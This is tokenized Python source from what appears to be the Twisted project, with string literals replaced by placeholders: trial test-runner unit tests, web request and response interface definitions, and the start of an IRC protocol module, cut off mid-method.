path , <EOL> '<STR_LIT>' : runDirectory . child ( '<STR_LIT>' ) . path } ) <EOL> def test_concurrentExplicitWorkingDirectory ( self ) : <EOL> """<STR_LIT>""" <EOL> self . parseOptions ( [ '<STR_LIT>' , os . path . abspath ( self . mktemp ( ) ) ] ) <EOL> initialDirectory = os . getcwd ( ) <EOL> self . addCleanup ( os . chdir , initialDirectory ) <EOL> firstRunner = self . getRunner ( ) <EOL> secondRunner = self . getRunner ( ) <EOL> class ConcurrentCase ( unittest . TestCase ) : <EOL> def test_concurrent ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( <EOL> util . _WorkingDirectoryBusy , <EOL> secondRunner . run , ConcurrentCase ( '<STR_LIT>' ) ) <EOL> def test_failure ( self ) : <EOL> """<STR_LIT>""" <EOL> self . fail ( "<STR_LIT>" ) <EOL> result = firstRunner . run ( ConcurrentCase ( '<STR_LIT>' ) ) <EOL> bad = result . errors + result . failures <EOL> if bad : <EOL> self . fail ( bad [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) <EOL> def test_runner_normal ( self ) : <EOL> self . parseOptions ( [ '<STR_LIT>' , self . mktemp ( ) , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> my_runner = self . getRunner ( ) <EOL> loader = runner . TestLoader ( ) <EOL> suite = loader . loadByName ( '<STR_LIT>' , True ) <EOL> result = my_runner . run ( suite ) <EOL> self . assertEqual ( self . standardReport , result . _calls ) <EOL> def test_runner_debug ( self ) : <EOL> self . parseOptions ( [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> my_runner = self . getRunner ( ) <EOL> debugger = CapturingDebugger ( ) <EOL> def get_debugger ( ) : <EOL> return debugger <EOL> my_runner . _getDebugger = get_debugger <EOL> loader = runner . TestLoader ( ) <EOL> suite = loader . loadByName ( '<STR_LIT>' , True ) <EOL> result = my_runner . run ( suite ) <EOL> self . assertEqual ( self . standardReport , result . _calls ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , debugger . _calls ) <EOL> class RemoveSafelyTests ( unittest . 
TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_removeSafelyNoTrialMarker ( self ) : <EOL> """<STR_LIT>""" <EOL> directory = self . mktemp ( ) <EOL> os . mkdir ( directory ) <EOL> dirPath = filepath . FilePath ( directory ) <EOL> self . assertRaises ( util . _NoTrialMarker , util . _removeSafely , dirPath ) <EOL> def test_removeSafelyRemoveFailsMoveSucceeds ( self ) : <EOL> """<STR_LIT>""" <EOL> def dummyRemove ( ) : <EOL> """<STR_LIT>""" <EOL> raise OSError ( ) <EOL> out = StringIO . StringIO ( ) <EOL> self . patch ( sys , '<STR_LIT>' , out ) <EOL> directory = self . mktemp ( ) <EOL> os . mkdir ( directory ) <EOL> dirPath = filepath . FilePath ( directory ) <EOL> dirPath . child ( '<STR_LIT>' ) . touch ( ) <EOL> dirPath . remove = dummyRemove <EOL> util . _removeSafely ( dirPath ) <EOL> self . assertIn ( "<STR_LIT>" , out . getvalue ( ) ) <EOL> def test_removeSafelyRemoveFailsMoveFails ( self ) : <EOL> """<STR_LIT>""" <EOL> def dummyRemove ( ) : <EOL> """<STR_LIT>""" <EOL> raise OSError ( "<STR_LIT>" ) <EOL> def dummyMoveTo ( path ) : <EOL> """<STR_LIT>""" <EOL> raise OSError ( "<STR_LIT>" ) <EOL> out = StringIO . StringIO ( ) <EOL> self . patch ( sys , '<STR_LIT>' , out ) <EOL> directory = self . mktemp ( ) <EOL> os . mkdir ( directory ) <EOL> dirPath = filepath . FilePath ( directory ) <EOL> dirPath . child ( '<STR_LIT>' ) . touch ( ) <EOL> dirPath . remove = dummyRemove <EOL> dirPath . moveTo = dummyMoveTo <EOL> error = self . assertRaises ( OSError , util . _removeSafely , dirPath ) <EOL> self . assertEqual ( str ( error ) , "<STR_LIT>" ) <EOL> self . assertIn ( "<STR_LIT>" , out . getvalue ( ) ) <EOL> class TestTrialSuite ( unittest . TestCase ) : <EOL> def test_imports ( self ) : <EOL> from twisted . trial . runner import TrialSuite <EOL> class TestUntilFailure ( unittest . TestCase ) : <EOL> class FailAfter ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> count = [ ] <EOL> def test_foo ( self ) : <EOL> self . count . 
append ( None ) <EOL> if len ( self . count ) == <NUM_LIT:3> : <EOL> self . fail ( '<STR_LIT>' ) <EOL> def setUp ( self ) : <EOL> TestUntilFailure . FailAfter . count = [ ] <EOL> self . test = TestUntilFailure . FailAfter ( '<STR_LIT>' ) <EOL> self . stream = StringIO . StringIO ( ) <EOL> self . runner = runner . TrialRunner ( reporter . Reporter , stream = self . stream ) <EOL> def test_runUntilFailure ( self ) : <EOL> """<STR_LIT>""" <EOL> result = self . runner . runUntilFailure ( self . test ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . failIf ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( self . _getFailures ( result ) , <NUM_LIT:1> ) <EOL> def _getFailures ( self , result ) : <EOL> """<STR_LIT>""" <EOL> return len ( result . failures ) <EOL> def test_runUntilFailureDecorate ( self ) : <EOL> """<STR_LIT>""" <EOL> decorated = [ ] <EOL> def decorate ( test , interface ) : <EOL> decorated . append ( ( test , interface ) ) <EOL> return test <EOL> self . patch ( unittest , "<STR_LIT>" , decorate ) <EOL> result = self . runner . runUntilFailure ( self . test ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( decorated ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( decorated , [ ( self . test , ITestCase ) ] ) <EOL> def test_runUntilFailureForceGCDecorate ( self ) : <EOL> """<STR_LIT>""" <EOL> decorated = [ ] <EOL> def decorate ( test , interface ) : <EOL> decorated . append ( ( test , interface ) ) <EOL> return test <EOL> self . patch ( unittest , "<STR_LIT>" , decorate ) <EOL> self . runner . _forceGarbageCollection = True <EOL> result = self . runner . runUntilFailure ( self . test ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . assertEqual ( len ( decorated ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( decorated , <EOL> [ ( self . test , ITestCase ) , <EOL> ( self . test , unittest . 
_ForceGarbageCollectionDecorator ) ] ) <EOL> class UncleanUntilFailureTests ( TestUntilFailure ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> TestUntilFailure . setUp ( self ) <EOL> self . runner = runner . TrialRunner ( reporter . Reporter , stream = self . stream , <EOL> uncleanWarnings = True ) <EOL> def _getFailures ( self , result ) : <EOL> """<STR_LIT>""" <EOL> return len ( result . _originalReporter . failures ) <EOL> class BreakingSuite ( runner . TestSuite ) : <EOL> """<STR_LIT>""" <EOL> def run ( self , result ) : <EOL> try : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> except RuntimeError : <EOL> log . err ( failure . Failure ( ) ) <EOL> class TestLoggedErrors ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def tearDown ( self ) : <EOL> self . flushLoggedErrors ( RuntimeError ) <EOL> def test_construct ( self ) : <EOL> """<STR_LIT>""" <EOL> suite = runner . LoggedSuite ( ) <EOL> self . assertEqual ( suite . countTestCases ( ) , <NUM_LIT:0> ) <EOL> def test_capturesError ( self ) : <EOL> """<STR_LIT>""" <EOL> result = reporter . TestResult ( ) <EOL> suite = runner . LoggedSuite ( [ BreakingSuite ( ) ] ) <EOL> suite . run ( result ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( result . errors [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] . id ( ) , runner . NOT_IN_TEST ) <EOL> self . failUnless ( result . errors [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] . check ( RuntimeError ) ) <EOL> class TestTestHolder ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . description = "<STR_LIT:description>" <EOL> self . holder = runner . TestHolder ( self . description ) <EOL> def test_holder ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . holder . id ( ) , self . description ) <EOL> self . assertEqual ( self . holder . shortDescription ( ) , self . description ) <EOL> def test_holderImplementsITestCase ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertIdentical ( self . 
holder , ITestCase ( self . holder ) ) <EOL> self . assertTrue ( <EOL> verifyObject ( ITestCase , self . holder ) , <EOL> "<STR_LIT>" <EOL> % ( self . holder , ITestCase ) ) <EOL> def test_runsWithStandardResult ( self ) : <EOL> """<STR_LIT>""" <EOL> result = pyunit . TestResult ( ) <EOL> self . holder . run ( result ) <EOL> self . assertTrue ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , result . testsRun ) <EOL> class ErrorHolderTestsMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> exceptionForTests = ZeroDivisionError ( '<STR_LIT>' ) <EOL> class TestResultStub ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . errors = [ ] <EOL> def startTest ( self , test ) : <EOL> pass <EOL> def stopTest ( self , test ) : <EOL> pass <EOL> def addError ( self , test , error ) : <EOL> self . errors . append ( ( test , error ) ) <EOL> def test_runsWithStandardResult ( self ) : <EOL> """<STR_LIT>""" <EOL> result = pyunit . TestResult ( ) <EOL> self . holder . run ( result ) <EOL> self . assertFalse ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , result . testsRun ) <EOL> def test_run ( self ) : <EOL> """<STR_LIT>""" <EOL> self . holder . run ( self . result ) <EOL> self . assertEqual ( <EOL> self . result . errors , <EOL> [ ( self . holder , ( self . error . type , self . error . value , self . error . tb ) ) ] ) <EOL> def test_call ( self ) : <EOL> """<STR_LIT>""" <EOL> self . holder ( self . result ) <EOL> self . assertEqual ( <EOL> self . result . errors , <EOL> [ ( self . holder , ( self . error . type , self . error . value , self . error . tb ) ) ] ) <EOL> def test_countTestCases ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . holder . countTestCases ( ) , <NUM_LIT:0> ) <EOL> def test_repr ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( repr ( self . 
holder ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class FailureHoldingErrorHolderTests ( ErrorHolderTestsMixin , TestTestHolder ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . description = "<STR_LIT:description>" <EOL> try : <EOL> raise self . exceptionForTests <EOL> except ZeroDivisionError : <EOL> self . error = failure . Failure ( ) <EOL> self . holder = runner . ErrorHolder ( self . description , self . error ) <EOL> self . result = self . TestResultStub ( ) <EOL> class ExcInfoHoldingErrorHolderTests ( ErrorHolderTestsMixin , TestTestHolder ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . description = "<STR_LIT:description>" <EOL> try : <EOL> raise self . exceptionForTests <EOL> except ZeroDivisionError : <EOL> exceptionInfo = sys . exc_info ( ) <EOL> self . error = failure . Failure ( ) <EOL> self . holder = runner . ErrorHolder ( self . description , exceptionInfo ) <EOL> self . result = self . TestResultStub ( ) <EOL> class TestMalformedMethod ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> class ContainMalformed ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_foo ( self , blah ) : <EOL> pass <EOL> def test_bar ( ) : <EOL> pass <EOL> test_spam = defer . deferredGenerator ( test_bar ) <EOL> def _test ( self , method ) : <EOL> """<STR_LIT>""" <EOL> stream = StringIO . StringIO ( ) <EOL> trialRunner = runner . TrialRunner ( reporter . Reporter , stream = stream ) <EOL> test = TestMalformedMethod . ContainMalformed ( method ) <EOL> result = trialRunner . run ( test ) <EOL> self . assertEqual ( result . testsRun , <NUM_LIT:1> ) <EOL> self . failIf ( result . wasSuccessful ( ) ) <EOL> self . assertEqual ( len ( result . errors ) , <NUM_LIT:1> ) <EOL> def test_extraArg ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _test ( '<STR_LIT>' ) <EOL> def test_noArg ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _test ( '<STR_LIT>' ) <EOL> def test_decorated ( self ) : <EOL> """<STR_LIT>""" <EOL> self . 
_test ( '<STR_LIT>' ) <EOL> class DestructiveTestSuiteTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_basic ( self ) : <EOL> """<STR_LIT>""" <EOL> called = [ ] <EOL> class MockTest ( unittest . TestCase ) : <EOL> def test_foo ( test ) : <EOL> called . append ( True ) <EOL> test = MockTest ( '<STR_LIT>' ) <EOL> result = reporter . TestResult ( ) <EOL> suite = runner . DestructiveTestSuite ( [ test ] ) <EOL> self . assertEqual ( called , [ ] ) <EOL> suite . run ( result ) <EOL> self . assertEqual ( called , [ True ] ) <EOL> self . assertEqual ( suite . countTestCases ( ) , <NUM_LIT:0> ) <EOL> def test_shouldStop ( self ) : <EOL> """<STR_LIT>""" <EOL> called = [ ] <EOL> class MockTest ( unittest . TestCase ) : <EOL> def test_foo1 ( test ) : <EOL> called . append ( <NUM_LIT:1> ) <EOL> def test_foo2 ( test ) : <EOL> raise KeyboardInterrupt ( ) <EOL> def test_foo3 ( test ) : <EOL> called . append ( <NUM_LIT:2> ) <EOL> result = reporter . TestResult ( ) <EOL> loader = runner . TestLoader ( ) <EOL> loader . suiteFactory = runner . DestructiveTestSuite <EOL> suite = loader . loadClass ( MockTest ) <EOL> self . assertEqual ( called , [ ] ) <EOL> suite . run ( result ) <EOL> self . assertEqual ( called , [ <NUM_LIT:1> ] ) <EOL> self . assertEqual ( suite . countTestCases ( ) , <NUM_LIT:1> ) <EOL> def test_cleanup ( self ) : <EOL> """<STR_LIT>""" <EOL> class MockTest ( unittest . TestCase ) : <EOL> def test_foo ( test ) : <EOL> pass <EOL> test = MockTest ( '<STR_LIT>' ) <EOL> result = reporter . TestResult ( ) <EOL> suite = runner . DestructiveTestSuite ( [ test ] ) <EOL> self . assertEqual ( suite . countTestCases ( ) , <NUM_LIT:1> ) <EOL> suite . run ( result ) <EOL> self . assertEqual ( suite . countTestCases ( ) , <NUM_LIT:0> ) <EOL> class TestRunnerDeprecation ( unittest . TestCase ) : <EOL> class FakeReporter ( reporter . 
Reporter ) : <EOL> """<STR_LIT>""" <EOL> done = None <EOL> separator = None <EOL> stream = None <EOL> def printErrors ( self , * args ) : <EOL> pass <EOL> def printSummary ( self , * args ) : <EOL> pass <EOL> def write ( self , * args ) : <EOL> pass <EOL> def writeln ( self , * args ) : <EOL> pass <EOL> def test_reporterDeprecations ( self ) : <EOL> """<STR_LIT>""" <EOL> trialRunner = runner . TrialRunner ( None ) <EOL> result = self . FakeReporter ( ) <EOL> trialRunner . _makeResult = lambda : result <EOL> def f ( ) : <EOL> trialRunner . run ( pyunit . TestCase ( '<STR_LIT:id>' ) ) <EOL> self . assertWarns ( <EOL> DeprecationWarning , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % reflect . qual ( result . __class__ ) , <EOL> __file__ , f ) </s>
<s> """<STR_LIT>""" <EOL> from zope . interface import Interface , Attribute <EOL> from twisted . internet . interfaces import IPushProducer <EOL> from twisted . cred . credentials import IUsernameDigestHash <EOL> class IRequest ( Interface ) : <EOL> """<STR_LIT>""" <EOL> method = Attribute ( "<STR_LIT>" ) <EOL> uri = Attribute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> path = Attribute ( <EOL> "<STR_LIT>" ) <EOL> args = Attribute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> received_headers = Attribute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> requestHeaders = Attribute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> headers = Attribute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> responseHeaders = Attribute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def getHeader ( key ) : <EOL> """<STR_LIT>""" <EOL> def getCookie ( key ) : <EOL> """<STR_LIT>""" <EOL> def getAllHeaders ( ) : <EOL> """<STR_LIT>""" <EOL> def getRequestHostname ( ) : <EOL> """<STR_LIT>""" <EOL> def getHost ( ) : <EOL> """<STR_LIT>""" <EOL> def getClientIP ( ) : <EOL> """<STR_LIT>""" <EOL> def getClient ( ) : <EOL> """<STR_LIT>""" <EOL> def getUser ( ) : <EOL> """<STR_LIT>""" <EOL> def getPassword ( ) : <EOL> """<STR_LIT>""" <EOL> def isSecure ( ) : <EOL> """<STR_LIT>""" <EOL> def getSession ( sessionInterface = None ) : <EOL> """<STR_LIT>""" <EOL> def URLPath ( ) : <EOL> """<STR_LIT>""" <EOL> def prePathURL ( ) : <EOL> """<STR_LIT>""" <EOL> def rememberRootURL ( ) : <EOL> """<STR_LIT>""" <EOL> def getRootURL ( ) : <EOL> """<STR_LIT>""" <EOL> def finish ( ) : <EOL> """<STR_LIT>""" <EOL> def write ( data ) : <EOL> """<STR_LIT>""" <EOL> def addCookie ( k , v , expires = None , domain = None , path = None , max_age = None , comment = None , secure = None ) : <EOL> """<STR_LIT>""" <EOL> def setResponseCode ( code , message = None ) : <EOL> """<STR_LIT>""" <EOL> def setHeader ( k , v ) : 
<EOL> """<STR_LIT>""" <EOL> def redirect ( url ) : <EOL> """<STR_LIT>""" <EOL> def setLastModified ( when ) : <EOL> """<STR_LIT>""" <EOL> def setETag ( etag ) : <EOL> """<STR_LIT>""" <EOL> def setHost ( host , port , ssl = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> class ICredentialFactory ( Interface ) : <EOL> """<STR_LIT>""" <EOL> scheme = Attribute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def getChallenge ( request ) : <EOL> """<STR_LIT>""" <EOL> def decode ( response , request ) : <EOL> """<STR_LIT>""" <EOL> class IBodyProducer ( IPushProducer ) : <EOL> """<STR_LIT>""" <EOL> length = Attribute ( <EOL> """<STR_LIT>""" ) <EOL> def startProducing ( consumer ) : <EOL> """<STR_LIT>""" <EOL> def stopProducing ( ) : <EOL> """<STR_LIT>""" <EOL> class IRenderable ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def lookupRenderMethod ( name ) : <EOL> """<STR_LIT>""" <EOL> def render ( request ) : <EOL> """<STR_LIT>""" <EOL> class ITemplateLoader ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def load ( ) : <EOL> """<STR_LIT>""" <EOL> class IResponse ( Interface ) : <EOL> """<STR_LIT>""" <EOL> version = Attribute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> code = Attribute ( "<STR_LIT>" ) <EOL> phrase = Attribute ( <EOL> "<STR_LIT>" ) <EOL> headers = Attribute ( "<STR_LIT>" ) <EOL> length = Attribute ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def deliverBody ( protocol ) : <EOL> """<STR_LIT>""" <EOL> UNKNOWN_LENGTH = u"<STR_LIT>" <EOL> __all__ = [ <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ] </s>
<s> """<STR_LIT>""" <EOL> import errno , os , random , re , stat , struct , sys , time , types , traceback <EOL> import string , socket <EOL> import warnings <EOL> import textwrap <EOL> from os import path <EOL> from twisted . internet import reactor , protocol , task <EOL> from twisted . persisted import styles <EOL> from twisted . protocols import basic <EOL> from twisted . python import log , reflect , text <EOL> from twisted . python . compat import set <EOL> NUL = chr ( <NUM_LIT:0> ) <EOL> CR = chr ( <NUM_LIT:0> <NUM_LIT:15> ) <EOL> NL = chr ( <NUM_LIT:0> <NUM_LIT:12> ) <EOL> LF = NL <EOL> SPC = chr ( <NUM_LIT:0> <NUM_LIT> ) <EOL> MAX_COMMAND_LENGTH = <NUM_LIT> <EOL> CHANNEL_PREFIXES = '<STR_LIT>' <EOL> class IRCBadMessage ( Exception ) : <EOL> pass <EOL> class IRCPasswordMismatch ( Exception ) : <EOL> pass <EOL> class IRCBadModes ( ValueError ) : <EOL> """<STR_LIT>""" <EOL> def parsemsg ( s ) : <EOL> """<STR_LIT>""" <EOL> prefix = '<STR_LIT>' <EOL> trailing = [ ] <EOL> if not s : <EOL> raise IRCBadMessage ( "<STR_LIT>" ) <EOL> if s [ <NUM_LIT:0> ] == '<STR_LIT::>' : <EOL> prefix , s = s [ <NUM_LIT:1> : ] . split ( '<STR_LIT:U+0020>' , <NUM_LIT:1> ) <EOL> if s . find ( '<STR_LIT>' ) != - <NUM_LIT:1> : <EOL> s , trailing = s . split ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> args = s . split ( ) <EOL> args . append ( trailing ) <EOL> else : <EOL> args = s . split ( ) <EOL> command = args . pop ( <NUM_LIT:0> ) <EOL> return prefix , command , args <EOL> def split ( str , length = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> return [ chunk <EOL> for line in str . split ( '<STR_LIT:\n>' ) <EOL> for chunk in textwrap . 
wrap ( line , length ) ] <EOL> def _intOrDefault ( value , default = None ) : <EOL> """<STR_LIT>""" <EOL> if value : <EOL> try : <EOL> return int ( value ) <EOL> except ( TypeError , ValueError ) : <EOL> pass <EOL> return default <EOL> class UnhandledCommand ( RuntimeError ) : <EOL> """<STR_LIT>""" <EOL> class _CommandDispatcherMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> prefix = None <EOL> def dispatch ( self , commandName , * args ) : <EOL> """<STR_LIT>""" <EOL> def _getMethodName ( command ) : <EOL> return '<STR_LIT>' % ( self . prefix , command ) <EOL> def _getMethod ( name ) : <EOL> return getattr ( self , _getMethodName ( name ) , None ) <EOL> method = _getMethod ( commandName ) <EOL> if method is not None : <EOL> return method ( * args ) <EOL> method = _getMethod ( '<STR_LIT>' ) <EOL> if method is None : <EOL> raise UnhandledCommand ( "<STR_LIT>" % ( _getMethodName ( commandName ) , ) ) <EOL> return method ( commandName , * args ) <EOL> def parseModes ( modes , params , paramModes = ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> """<STR_LIT>""" <EOL> if len ( modes ) == <NUM_LIT:0> : <EOL> raise IRCBadModes ( '<STR_LIT>' ) <EOL> if modes [ <NUM_LIT:0> ] not in '<STR_LIT>' : <EOL> raise IRCBadModes ( '<STR_LIT>' % ( modes , ) ) <EOL> changes = ( [ ] , [ ] ) <EOL> direction = None <EOL> count = - <NUM_LIT:1> <EOL> for ch in modes : <EOL> if ch in '<STR_LIT>' : <EOL> if count == <NUM_LIT:0> : <EOL> raise IRCBadModes ( '<STR_LIT>' % ( modes , ) ) <EOL> direction = '<STR_LIT>' . index ( ch ) <EOL> count = <NUM_LIT:0> <EOL> else : <EOL> param = None <EOL> if ch in paramModes [ direction ] : <EOL> try : <EOL> param = params . pop ( <NUM_LIT:0> ) <EOL> except IndexError : <EOL> raise IRCBadModes ( '<STR_LIT>' % ( ch , ) ) <EOL> changes [ direction ] . 
append ( ( ch , param ) ) <EOL> count += <NUM_LIT:1> <EOL> if len ( params ) > <NUM_LIT:0> : <EOL> raise IRCBadModes ( '<STR_LIT>' % ( modes , params ) ) <EOL> if count == <NUM_LIT:0> : <EOL> raise IRCBadModes ( '<STR_LIT>' % ( modes , ) ) <EOL> return changes <EOL> class IRC ( protocol . Protocol ) : <EOL> """<STR_LIT>""" <EOL> buffer = "<STR_LIT>" <EOL> hostname = None <EOL> encoding = None <EOL> def connectionMade ( self ) : <EOL> self . channels = [ ] <EOL> if self . hostname is None : <EOL> self . hostname = socket . getfqdn ( ) <EOL> def sendLine ( self , line ) : <EOL> if self . encoding is not None : <EOL> if isinstance ( line , unicode ) : <EOL> line = line . encode ( self . encoding ) <EOL> self . transport . write ( "<STR_LIT>" % ( line , CR , LF ) ) <EOL> def sendMessage ( self , command , * parameter_list , ** prefix ) : <EOL> """<STR_LIT>""" <EOL> if not command : <EOL> raise ValueError , "<STR_LIT>" <EOL> if '<STR_LIT:U+0020>' in command or command [ <NUM_LIT:0> ] == '<STR_LIT::>' : <EOL> raise ValueError , "<STR_LIT>" "<STR_LIT>" % command <EOL> line = string . join ( [ command ] + list ( parameter_list ) ) <EOL> if '<STR_LIT>' in prefix : <EOL> line = "<STR_LIT>" % ( prefix [ '<STR_LIT>' ] , line ) <EOL> self . sendLine ( line ) <EOL> if len ( parameter_list ) > <NUM_LIT:15> : <EOL> log . msg ( "<STR_LIT>" % <EOL> ( len ( parameter_list ) , line ) ) <EOL> def dataReceived ( self , data ) : <EOL> """<STR_LIT>""" <EOL> lines = ( self . buffer + data ) . split ( LF ) <EOL> self . buffer = lines . pop ( ) <EOL> for line in lines : <EOL> if len ( line ) <= <NUM_LIT:2> : <EOL> continue <EOL> if line [ - <NUM_LIT:1> ] == CR : <EOL> line = line [ : - <NUM_LIT:1> ] <EOL> prefix , command , params = parsemsg ( line ) <EOL> command = command . upper ( ) <EOL> self . 
handleCommand ( command , prefix , params ) <EOL> def handleCommand ( self , command , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> method = getattr ( self , "<STR_LIT>" % command , None ) <EOL> try : <EOL> if method is not None : <EOL> method ( prefix , params ) <EOL> else : <EOL> self . irc_unknown ( prefix , command , params ) <EOL> except : <EOL> log . deferr ( ) <EOL> def irc_unknown ( self , prefix , command , params ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( command , prefix , params ) <EOL> def privmsg ( self , sender , recip , message ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( "<STR_LIT>" % ( sender , recip , lowQuote ( message ) ) ) <EOL> def notice ( self , sender , recip , message ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( "<STR_LIT>" % ( sender , recip , message ) ) <EOL> def action ( self , sender , recip , message ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( "<STR_LIT>" % ( sender , recip , message ) ) <EOL> def topic ( self , user , channel , topic , author = None ) : <EOL> """<STR_LIT>""" <EOL> if author is None : <EOL> if topic is None : <EOL> self . sendLine ( '<STR_LIT>' % ( <EOL> self . hostname , RPL_NOTOPIC , user , channel , '<STR_LIT>' ) ) <EOL> else : <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_TOPIC , user , channel , lowQuote ( topic ) ) ) <EOL> else : <EOL> self . sendLine ( "<STR_LIT>" % ( author , channel , lowQuote ( topic ) ) ) <EOL> def topicAuthor ( self , user , channel , author , date ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( '<STR_LIT>' % ( <EOL> self . hostname , <NUM_LIT> , user , channel , author , date ) ) <EOL> def names ( self , user , channel , names ) : <EOL> """<STR_LIT>""" <EOL> prefixLength = len ( channel ) + len ( user ) + <NUM_LIT:10> <EOL> namesLength = <NUM_LIT> - prefixLength <EOL> L = [ ] <EOL> count = <NUM_LIT:0> <EOL> for n in names : <EOL> if count + len ( n ) + <NUM_LIT:1> > namesLength : <EOL> self . 
sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_NAMREPLY , user , channel , '<STR_LIT:U+0020>' . join ( L ) ) ) <EOL> L = [ n ] <EOL> count = len ( n ) <EOL> else : <EOL> L . append ( n ) <EOL> count += len ( n ) + <NUM_LIT:1> <EOL> if L : <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_NAMREPLY , user , channel , '<STR_LIT:U+0020>' . join ( L ) ) ) <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_ENDOFNAMES , user , channel ) ) <EOL> def who ( self , user , channel , memberInfo ) : <EOL> """<STR_LIT>""" <EOL> for info in memberInfo : <EOL> ( username , hostmask , server , nickname , flag , hops , realName ) = info <EOL> assert flag in ( "<STR_LIT:H>" , "<STR_LIT>" ) <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_WHOREPLY , user , channel , <EOL> username , hostmask , server , nickname , flag , hops , realName ) ) <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_ENDOFWHO , user , channel ) ) <EOL> def whois ( self , user , nick , username , hostname , realName , server , serverInfo , oper , idle , signOn , channels ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_WHOISUSER , user , nick , username , hostname , realName ) ) <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_WHOISSERVER , user , nick , server , serverInfo ) ) <EOL> if oper : <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_WHOISOPERATOR , user , nick ) ) <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_WHOISIDLE , user , nick , idle , signOn ) ) <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_WHOISCHANNELS , user , nick , '<STR_LIT:U+0020>' . join ( channels ) ) ) <EOL> self . sendLine ( "<STR_LIT>" % ( <EOL> self . hostname , RPL_ENDOFWHOIS , user , nick ) ) <EOL> def join ( self , who , where ) : <EOL> """<STR_LIT>""" <EOL> self . 
